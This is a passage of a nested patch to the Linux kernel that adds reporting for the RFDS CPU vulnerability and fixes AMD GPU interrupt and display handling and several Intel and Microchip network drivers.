++	 ARCH_CAP_RFDS_NO | ARCH_CAP_RFDS_CLEAR)
+ 
+ static u64 kvm_get_arch_capabilities(void)
+ {
+@@ -1650,6 +1651,8 @@ static u64 kvm_get_arch_capabilities(void)
+ 		data |= ARCH_CAP_SSB_NO;
+ 	if (!boot_cpu_has_bug(X86_BUG_MDS))
+ 		data |= ARCH_CAP_MDS_NO;
++	if (!boot_cpu_has_bug(X86_BUG_RFDS))
++		data |= ARCH_CAP_RFDS_NO;
+ 
+ 	if (!boot_cpu_has(X86_FEATURE_RTM)) {
+ 		/*
+diff --git a/drivers/base/cpu.c b/drivers/base/cpu.c
+index dab70a65377c8..31da94afe4f3d 100644
+--- a/drivers/base/cpu.c
++++ b/drivers/base/cpu.c
+@@ -589,6 +589,12 @@ ssize_t __weak cpu_show_spec_rstack_overflow(struct device *dev,
+ 	return sysfs_emit(buf, "Not affected\n");
+ }
+ 
++ssize_t __weak cpu_show_reg_file_data_sampling(struct device *dev,
++					       struct device_attribute *attr, char *buf)
++{
++	return sysfs_emit(buf, "Not affected\n");
++}
++
+ static DEVICE_ATTR(meltdown, 0444, cpu_show_meltdown, NULL);
+ static DEVICE_ATTR(spectre_v1, 0444, cpu_show_spectre_v1, NULL);
+ static DEVICE_ATTR(spectre_v2, 0444, cpu_show_spectre_v2, NULL);
+@@ -602,6 +608,7 @@ static DEVICE_ATTR(mmio_stale_data, 0444, cpu_show_mmio_stale_data, NULL);
+ static DEVICE_ATTR(retbleed, 0444, cpu_show_retbleed, NULL);
+ static DEVICE_ATTR(gather_data_sampling, 0444, cpu_show_gds, NULL);
+ static DEVICE_ATTR(spec_rstack_overflow, 0444, cpu_show_spec_rstack_overflow, NULL);
++static DEVICE_ATTR(reg_file_data_sampling, 0444, cpu_show_reg_file_data_sampling, NULL);
+ 
+ static struct attribute *cpu_root_vulnerabilities_attrs[] = {
+ 	&dev_attr_meltdown.attr,
+@@ -617,6 +624,7 @@ static struct attribute *cpu_root_vulnerabilities_attrs[] = {
+ 	&dev_attr_retbleed.attr,
+ 	&dev_attr_gather_data_sampling.attr,
+ 	&dev_attr_spec_rstack_overflow.attr,
++	&dev_attr_reg_file_data_sampling.attr,
+ 	NULL
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/cik_ih.c b/drivers/gpu/drm/amd/amdgpu/cik_ih.c
+index df385ffc97683..6578ca1b90afa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/cik_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/cik_ih.c
+@@ -204,6 +204,12 @@ static u32 cik_ih_get_wptr(struct amdgpu_device *adev,
+ 		tmp = RREG32(mmIH_RB_CNTL);
+ 		tmp |= IH_RB_CNTL__WPTR_OVERFLOW_CLEAR_MASK;
+ 		WREG32(mmIH_RB_CNTL, tmp);
++
++		/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++		 * can be detected.
++		 */
++		tmp &= ~IH_RB_CNTL__WPTR_OVERFLOW_CLEAR_MASK;
++		WREG32(mmIH_RB_CNTL, tmp);
+ 	}
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/cz_ih.c b/drivers/gpu/drm/amd/amdgpu/cz_ih.c
+index b8c47e0cf37ad..c19681492efa7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/cz_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/cz_ih.c
+@@ -216,6 +216,11 @@ static u32 cz_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32(mmIH_RB_CNTL, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32(mmIH_RB_CNTL, tmp);
+ 
+ out:
+ 	return (wptr & ih->ptr_mask);
+diff --git a/drivers/gpu/drm/amd/amdgpu/iceland_ih.c b/drivers/gpu/drm/amd/amdgpu/iceland_ih.c
+index aecad530b10a6..2c02ae69883d2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/iceland_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/iceland_ih.c
+@@ -215,6 +215,11 @@ static u32 iceland_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32(mmIH_RB_CNTL, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32(mmIH_RB_CNTL, tmp);
+ 
+ out:
+ 	return (wptr & ih->ptr_mask);
+diff --git a/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c b/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
+index 7cd79a3844b24..657e4ca6f9dd2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
+@@ -417,6 +417,12 @@ static u32 ih_v6_0_get_wptr(struct amdgpu_device *adev,
+ 	tmp = RREG32_NO_KIQ(ih_regs->ih_rb_cntl);
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/navi10_ih.c b/drivers/gpu/drm/amd/amdgpu/navi10_ih.c
+index eec13cb5bf758..84e8e8b008ef6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/navi10_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/navi10_ih.c
+@@ -442,6 +442,12 @@ static u32 navi10_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = RREG32_NO_KIQ(ih_regs->ih_rb_cntl);
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/si_ih.c b/drivers/gpu/drm/amd/amdgpu/si_ih.c
+index 9a24f17a57502..cada9f300a7f5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/si_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/si_ih.c
+@@ -119,6 +119,12 @@ static u32 si_ih_get_wptr(struct amdgpu_device *adev,
+ 		tmp = RREG32(IH_RB_CNTL);
+ 		tmp |= IH_RB_CNTL__WPTR_OVERFLOW_CLEAR_MASK;
+ 		WREG32(IH_RB_CNTL, tmp);
++
++		/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++		 * can be detected.
++		 */
++		tmp &= ~IH_RB_CNTL__WPTR_OVERFLOW_CLEAR_MASK;
++		WREG32(IH_RB_CNTL, tmp);
+ 	}
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/tonga_ih.c b/drivers/gpu/drm/amd/amdgpu/tonga_ih.c
+index b08905d1c00f0..07a5d95be07f5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/tonga_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/tonga_ih.c
+@@ -219,6 +219,12 @@ static u32 tonga_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32(mmIH_RB_CNTL, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32(mmIH_RB_CNTL, tmp);
++
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/vega10_ih.c b/drivers/gpu/drm/amd/amdgpu/vega10_ih.c
+index 1e83db0c5438d..74c94df423455 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vega10_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/vega10_ih.c
+@@ -373,6 +373,12 @@ static u32 vega10_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/vega20_ih.c b/drivers/gpu/drm/amd/amdgpu/vega20_ih.c
+index 59dfca093155c..f1ba76c35cd6e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vega20_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/vega20_ih.c
+@@ -424,6 +424,12 @@ static u32 vega20_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index da16048bf1004..a6c6f286a5988 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -5938,6 +5938,7 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 	bool scale = dm_state ? (dm_state->scaling != RMX_OFF) : false;
+ 	int mode_refresh;
+ 	int preferred_refresh = 0;
++	enum color_transfer_func tf = TRANSFER_FUNC_UNKNOWN;
+ #if defined(CONFIG_DRM_AMD_DC_DCN)
+ 	struct dsc_dec_dpcd_caps dsc_caps;
+ #endif
+@@ -6071,7 +6072,9 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 			if (stream->link->dpcd_caps.dprx_feature.bits.VSC_SDP_COLORIMETRY_SUPPORTED)
+ 				stream->use_vsc_sdp_for_colorimetry = true;
+ 		}
+-		mod_build_vsc_infopacket(stream, &stream->vsc_infopacket, stream->output_color_space);
++		if (stream->out_transfer_func->tf == TRANSFER_FUNCTION_GAMMA22)
++			tf = TRANSFER_FUNC_GAMMA_22;
++		mod_build_vsc_infopacket(stream, &stream->vsc_infopacket, stream->output_color_space, tf);
+ 		aconnector->psr_skip_count = AMDGPU_DM_PSR_ENTRY_DELAY;
+ 
+ 	}
+@@ -10120,11 +10123,13 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		}
+ 
+ #if defined(CONFIG_DRM_AMD_DC_DCN)
+-		ret = compute_mst_dsc_configs_for_state(state, dm_state->context, vars);
+-		if (ret) {
+-			DRM_DEBUG_DRIVER("compute_mst_dsc_configs_for_state() failed\n");
+-			ret = -EINVAL;
+-			goto fail;
++		if (dc_resource_is_dsc_encoding_supported(dc)) {
++			ret = compute_mst_dsc_configs_for_state(state, dm_state->context, vars);
++			if (ret) {
++				DRM_DEBUG_DRIVER("compute_mst_dsc_configs_for_state() failed\n");
++				ret = -EINVAL;
++				goto fail;
++			}
+ 		}
+ 
+ 		ret = dm_update_mst_vcpi_slots_for_dsc(state, dm_state->context, vars);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link_dpcd.c b/drivers/gpu/drm/amd/display/dc/core/dc_link_dpcd.c
+index af110bf9470fa..aefca9756dbe8 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link_dpcd.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link_dpcd.c
+@@ -202,7 +202,7 @@ enum dc_status core_link_read_dpcd(
+ 	uint32_t extended_size;
+ 	/* size of the remaining partitioned address space */
+ 	uint32_t size_left_to_read;
+-	enum dc_status status;
++	enum dc_status status = DC_ERROR_UNEXPECTED;
+ 	/* size of the next partition to be read from */
+ 	uint32_t partition_size;
+ 	uint32_t data_index = 0;
+@@ -231,7 +231,7 @@ enum dc_status core_link_write_dpcd(
+ {
+ 	uint32_t partition_size;
+ 	uint32_t data_index = 0;
+-	enum dc_status status;
++	enum dc_status status = DC_ERROR_UNEXPECTED;
+ 
+ 	while (size) {
+ 		partition_size = dpcd_get_next_partition_size(address, size);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index 66923f51037a3..e2f80cd0ca8cb 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -3038,6 +3038,12 @@ static void set_avi_info_frame(
+ 		hdmi_info.bits.C0_C1   = COLORIMETRY_EXTENDED;
+ 	}
+ 
++	if (pixel_encoding && color_space == COLOR_SPACE_2020_YCBCR &&
++			stream->out_transfer_func->tf == TRANSFER_FUNCTION_GAMMA22) {
++		hdmi_info.bits.EC0_EC2 = 0;
++		hdmi_info.bits.C0_C1 = COLORIMETRY_ITU709;
++	}
++
+ 	/* TODO: un-hardcode aspect ratio */
+ 	aspect = stream->timing.aspect_ratio;
+ 
+diff --git a/drivers/gpu/drm/amd/display/modules/inc/mod_info_packet.h b/drivers/gpu/drm/amd/display/modules/inc/mod_info_packet.h
+index 1d8b746b02f24..edf5845f6a1f7 100644
+--- a/drivers/gpu/drm/amd/display/modules/inc/mod_info_packet.h
++++ b/drivers/gpu/drm/amd/display/modules/inc/mod_info_packet.h
+@@ -35,7 +35,8 @@ struct mod_vrr_params;
+ 
+ void mod_build_vsc_infopacket(const struct dc_stream_state *stream,
+ 		struct dc_info_packet *info_packet,
+-		enum dc_color_space cs);
++		enum dc_color_space cs,
++		enum color_transfer_func tf);
+ 
+ void mod_build_hf_vsif_infopacket(const struct dc_stream_state *stream,
+ 		struct dc_info_packet *info_packet);
+diff --git a/drivers/gpu/drm/amd/display/modules/info_packet/info_packet.c b/drivers/gpu/drm/amd/display/modules/info_packet/info_packet.c
+index 27ceba9d6d658..69691058ab898 100644
+--- a/drivers/gpu/drm/amd/display/modules/info_packet/info_packet.c
++++ b/drivers/gpu/drm/amd/display/modules/info_packet/info_packet.c
+@@ -132,7 +132,8 @@ enum ColorimetryYCCDP {
+ 
+ void mod_build_vsc_infopacket(const struct dc_stream_state *stream,
+ 		struct dc_info_packet *info_packet,
+-		enum dc_color_space cs)
++		enum dc_color_space cs,
++		enum color_transfer_func tf)
+ {
+ 	unsigned int vsc_packet_revision = vsc_packet_undefined;
+ 	unsigned int i;
+@@ -382,6 +383,9 @@ void mod_build_vsc_infopacket(const struct dc_stream_state *stream,
+ 				colorimetryFormat = ColorimetryYCC_DP_AdobeYCC;
+ 			else if (cs == COLOR_SPACE_2020_YCBCR)
+ 				colorimetryFormat = ColorimetryYCC_DP_ITU2020YCbCr;
++
++			if (cs == COLOR_SPACE_2020_YCBCR && tf == TRANSFER_FUNC_GAMMA_22)
++				colorimetryFormat = ColorimetryYCC_DP_ITU709;
+ 			break;
+ 
+ 		default:
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index c63e082dc57dc..934600eccbaf2 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -49,9 +49,9 @@ static int ksz8_ind_write8(struct ksz_device *dev, u8 table, u16 addr, u8 data)
+ 	mutex_lock(&dev->alu_mutex);
+ 
+ 	ctrl_addr = IND_ACC_TABLE(table) | addr;
+-	ret = ksz_write8(dev, regs[REG_IND_BYTE], data);
++	ret = ksz_write16(dev, regs[REG_IND_CTRL_0], ctrl_addr);
+ 	if (!ret)
+-		ret = ksz_write16(dev, regs[REG_IND_CTRL_0], ctrl_addr);
++		ret = ksz_write8(dev, regs[REG_IND_BYTE], data);
+ 
+ 	mutex_unlock(&dev->alu_mutex);
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 76455405a6d8e..d8a7fb21b7b76 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -13569,9 +13569,9 @@ int i40e_queue_pair_disable(struct i40e_vsi *vsi, int queue_pair)
+ 		return err;
+ 
+ 	i40e_queue_pair_disable_irq(vsi, queue_pair);
++	i40e_queue_pair_toggle_napi(vsi, queue_pair, false /* off */);
+ 	err = i40e_queue_pair_toggle_rings(vsi, queue_pair, false /* off */);
+ 	i40e_clean_rx_ring(vsi->rx_rings[queue_pair]);
+-	i40e_queue_pair_toggle_napi(vsi, queue_pair, false /* off */);
+ 	i40e_queue_pair_clean_rings(vsi, queue_pair);
+ 	i40e_queue_pair_reset_stats(vsi, queue_pair);
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index ab46cfca4028d..3117f65253b37 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -7681,6 +7681,8 @@ ice_bridge_setlink(struct net_device *dev, struct nlmsghdr *nlh,
+ 	pf_sw = pf->first_sw;
+ 	/* find the attribute in the netlink message */
+ 	br_spec = nlmsg_find_attr(nlh, sizeof(struct ifinfomsg), IFLA_AF_SPEC);
++	if (!br_spec)
++		return -EINVAL;
+ 
+ 	nla_for_each_nested(attr, br_spec, rem) {
+ 		__u16 mode;
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index 6c03ebf81ffda..4b71392f60df1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -440,7 +440,6 @@ static int ice_vc_get_vf_res_msg(struct ice_vf *vf, u8 *msg)
+ 		vf->driver_caps = *(u32 *)msg;
+ 	else
+ 		vf->driver_caps = VIRTCHNL_VF_OFFLOAD_L2 |
+-				  VIRTCHNL_VF_OFFLOAD_RSS_REG |
+ 				  VIRTCHNL_VF_OFFLOAD_VLAN;
+ 
+ 	vfres->vf_cap_flags = VIRTCHNL_VF_OFFLOAD_L2;
+@@ -453,14 +452,8 @@ static int ice_vc_get_vf_res_msg(struct ice_vf *vf, u8 *msg)
+ 	vfres->vf_cap_flags |= ice_vc_get_vlan_caps(hw, vf, vsi,
+ 						    vf->driver_caps);
+ 
+-	if (vf->driver_caps & VIRTCHNL_VF_OFFLOAD_RSS_PF) {
++	if (vf->driver_caps & VIRTCHNL_VF_OFFLOAD_RSS_PF)
+ 		vfres->vf_cap_flags |= VIRTCHNL_VF_OFFLOAD_RSS_PF;
+-	} else {
+-		if (vf->driver_caps & VIRTCHNL_VF_OFFLOAD_RSS_AQ)
+-			vfres->vf_cap_flags |= VIRTCHNL_VF_OFFLOAD_RSS_AQ;
+-		else
+-			vfres->vf_cap_flags |= VIRTCHNL_VF_OFFLOAD_RSS_REG;
+-	}
+ 
+ 	if (vf->driver_caps & VIRTCHNL_VF_OFFLOAD_FDIR_PF)
+ 		vfres->vf_cap_flags |= VIRTCHNL_VF_OFFLOAD_FDIR_PF;
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_allowlist.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_allowlist.c
+index 5a82216e7d034..63e83e8b97e55 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_allowlist.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_allowlist.c
+@@ -13,8 +13,6 @@
+  * - opcodes needed by VF when caps are activated
+  *
+  * Caps that don't use new opcodes (no opcodes should be allowed):
+- * - VIRTCHNL_VF_OFFLOAD_RSS_AQ
+- * - VIRTCHNL_VF_OFFLOAD_RSS_REG
+  * - VIRTCHNL_VF_OFFLOAD_WB_ON_ITR
+  * - VIRTCHNL_VF_OFFLOAD_CRC
+  * - VIRTCHNL_VF_OFFLOAD_RX_POLLING
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 41ee081eb8875..48cf24709fe32 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -171,6 +171,10 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 			return -EBUSY;
+ 		usleep_range(1000, 2000);
+ 	}
++
++	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
++	ice_qvec_toggle_napi(vsi, q_vector, false);
++
+ 	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
+ 
+ 	ice_fill_txq_meta(vsi, tx_ring, &txq_meta);
+@@ -187,13 +191,10 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		if (err)
+ 			return err;
+ 	}
+-	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
+-
+ 	err = ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, true);
+ 	if (err)
+ 		return err;
+ 
+-	ice_qvec_toggle_napi(vsi, q_vector, false);
+ 	ice_qp_clean_rings(vsi, q_idx);
+ 	ice_qp_reset_stats(vsi, q_idx);
+ 
+@@ -256,11 +257,11 @@ static int ice_qp_ena(struct ice_vsi *vsi, u16 q_idx)
+ 	if (err)
+ 		goto free_buf;
+ 
+-	clear_bit(ICE_CFG_BUSY, vsi->state);
+ 	ice_qvec_toggle_napi(vsi, q_vector, true);
+ 	ice_qvec_ena_irq(vsi, q_vector);
+ 
+ 	netif_tx_start_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
++	clear_bit(ICE_CFG_BUSY, vsi->state);
+ free_buf:
+ 	kfree(qg_buf);
+ 	return err;
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 4b6f882b380dc..e052f49cc08d7 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -6330,7 +6330,7 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 	int cpu = smp_processor_id();
+ 	struct netdev_queue *nq;
+ 	struct igc_ring *ring;
+-	int i, drops;
++	int i, nxmit;
+ 
+ 	if (unlikely(!netif_carrier_ok(dev)))
+ 		return -ENETDOWN;
+@@ -6346,16 +6346,15 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 	/* Avoid transmit queue timeout since we share it with the slow path */
+ 	txq_trans_cond_update(nq);
+ 
+-	drops = 0;
++	nxmit = 0;
+ 	for (i = 0; i < num_frames; i++) {
+ 		int err;
+ 		struct xdp_frame *xdpf = frames[i];
+ 
+ 		err = igc_xdp_init_tx_descriptor(ring, xdpf);
+-		if (err) {
+-			xdp_return_frame_rx_napi(xdpf);
+-			drops++;
+-		}
++		if (err)
++			break;
++		nxmit++;
+ 	}
+ 
+ 	if (flags & XDP_XMIT_FLUSH)
+@@ -6363,7 +6362,7 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 
+ 	__netif_tx_unlock(nq);
+ 
+-	return num_frames - drops;
++	return nxmit;
+ }
+ 
+ static void igc_trigger_rxtxq_interrupt(struct igc_adapter *adapter,
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 6dc554e810a17..086cc25730338 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -2947,8 +2947,8 @@ static void ixgbe_check_lsc(struct ixgbe_adapter *adapter)
+ static inline void ixgbe_irq_enable_queues(struct ixgbe_adapter *adapter,
+ 					   u64 qmask)
+ {
+-	u32 mask;
+ 	struct ixgbe_hw *hw = &adapter->hw;
++	u32 mask;
+ 
+ 	switch (hw->mac.type) {
+ 	case ixgbe_mac_82598EB:
+@@ -10543,6 +10543,44 @@ static void ixgbe_reset_rxr_stats(struct ixgbe_ring *rx_ring)
+ 	memset(&rx_ring->rx_stats, 0, sizeof(rx_ring->rx_stats));
+ }
+ 
++/**
++ * ixgbe_irq_disable_single - Disable single IRQ vector
++ * @adapter: adapter structure
++ * @ring: ring index
++ **/
++static void ixgbe_irq_disable_single(struct ixgbe_adapter *adapter, u32 ring)
++{
++	struct ixgbe_hw *hw = &adapter->hw;
++	u64 qmask = BIT_ULL(ring);
++	u32 mask;
++
++	switch (adapter->hw.mac.type) {
++	case ixgbe_mac_82598EB:
++		mask = qmask & IXGBE_EIMC_RTX_QUEUE;
++		IXGBE_WRITE_REG(&adapter->hw, IXGBE_EIMC, mask);
++		break;
++	case ixgbe_mac_82599EB:
++	case ixgbe_mac_X540:
++	case ixgbe_mac_X550:
++	case ixgbe_mac_X550EM_x:
++	case ixgbe_mac_x550em_a:
++		mask = (qmask & 0xFFFFFFFF);
++		if (mask)
++			IXGBE_WRITE_REG(hw, IXGBE_EIMS_EX(0), mask);
++		mask = (qmask >> 32);
++		if (mask)
++			IXGBE_WRITE_REG(hw, IXGBE_EIMS_EX(1), mask);
++		break;
++	default:
++		break;
++	}
++	IXGBE_WRITE_FLUSH(&adapter->hw);
++	if (adapter->flags & IXGBE_FLAG_MSIX_ENABLED)
++		synchronize_irq(adapter->msix_entries[ring].vector);
++	else
++		synchronize_irq(adapter->pdev->irq);
++}
++
+ /**
+  * ixgbe_txrx_ring_disable - Disable Rx/Tx/XDP Tx rings
+  * @adapter: adapter structure
+@@ -10559,6 +10597,11 @@ void ixgbe_txrx_ring_disable(struct ixgbe_adapter *adapter, int ring)
+ 	tx_ring = adapter->tx_ring[ring];
+ 	xdp_ring = adapter->xdp_ring[ring];
+ 
++	ixgbe_irq_disable_single(adapter, ring);
++
++	/* Rx/Tx/XDP Tx share the same napi context. */
++	napi_disable(&rx_ring->q_vector->napi);
++
+ 	ixgbe_disable_txr(adapter, tx_ring);
+ 	if (xdp_ring)
+ 		ixgbe_disable_txr(adapter, xdp_ring);
+@@ -10567,9 +10610,6 @@ void ixgbe_txrx_ring_disable(struct ixgbe_adapter *adapter, int ring)
+ 	if (xdp_ring)
+ 		synchronize_rcu();
+ 
+-	/* Rx/Tx/XDP Tx share the same napi context. */
+-	napi_disable(&rx_ring->q_vector->napi);
+-
+ 	ixgbe_clean_tx_ring(tx_ring);
+ 	if (xdp_ring)
+ 		ixgbe_clean_tx_ring(xdp_ring);
+@@ -10597,9 +10637,6 @@ void ixgbe_txrx_ring_enable(struct ixgbe_adapter *adapter, int ring)
+ 	tx_ring = adapter->tx_ring[ring];
+ 	xdp_ring = adapter->xdp_ring[ring];
+ 
+-	/* Rx/Tx/XDP Tx share the same napi context. */
+-	napi_enable(&rx_ring->q_vector->napi);
+-
+ 	ixgbe_configure_tx_ring(adapter, tx_ring);
+ 	if (xdp_ring)
+ 		ixgbe_configure_tx_ring(adapter, xdp_ring);
+@@ -10608,6 +10645,11 @@ void ixgbe_txrx_ring_enable(struct ixgbe_adapter *adapter, int ring)
+ 	clear_bit(__IXGBE_TX_DISABLED, &tx_ring->state);
+ 	if (xdp_ring)
+ 		clear_bit(__IXGBE_TX_DISABLED, &xdp_ring->state);
++
++	/* Rx/Tx/XDP Tx share the same napi context. */
++	napi_enable(&rx_ring->q_vector->napi);
++	ixgbe_irq_enable_queues(adapter, BIT_ULL(ring));
++	IXGBE_WRITE_FLUSH(&adapter->hw);
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_mactable.c b/drivers/net/ethernet/microchip/sparx5/sparx5_mactable.c
+index 4af285918ea2a..75868b3f548ec 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_mactable.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_mactable.c
+@@ -347,10 +347,10 @@ int sparx5_del_mact_entry(struct sparx5 *sparx5,
+ 				 list) {
+ 		if ((vid == 0 || mact_entry->vid == vid) &&
+ 		    ether_addr_equal(addr, mact_entry->mac)) {
++			sparx5_mact_forget(sparx5, addr, mact_entry->vid);
++
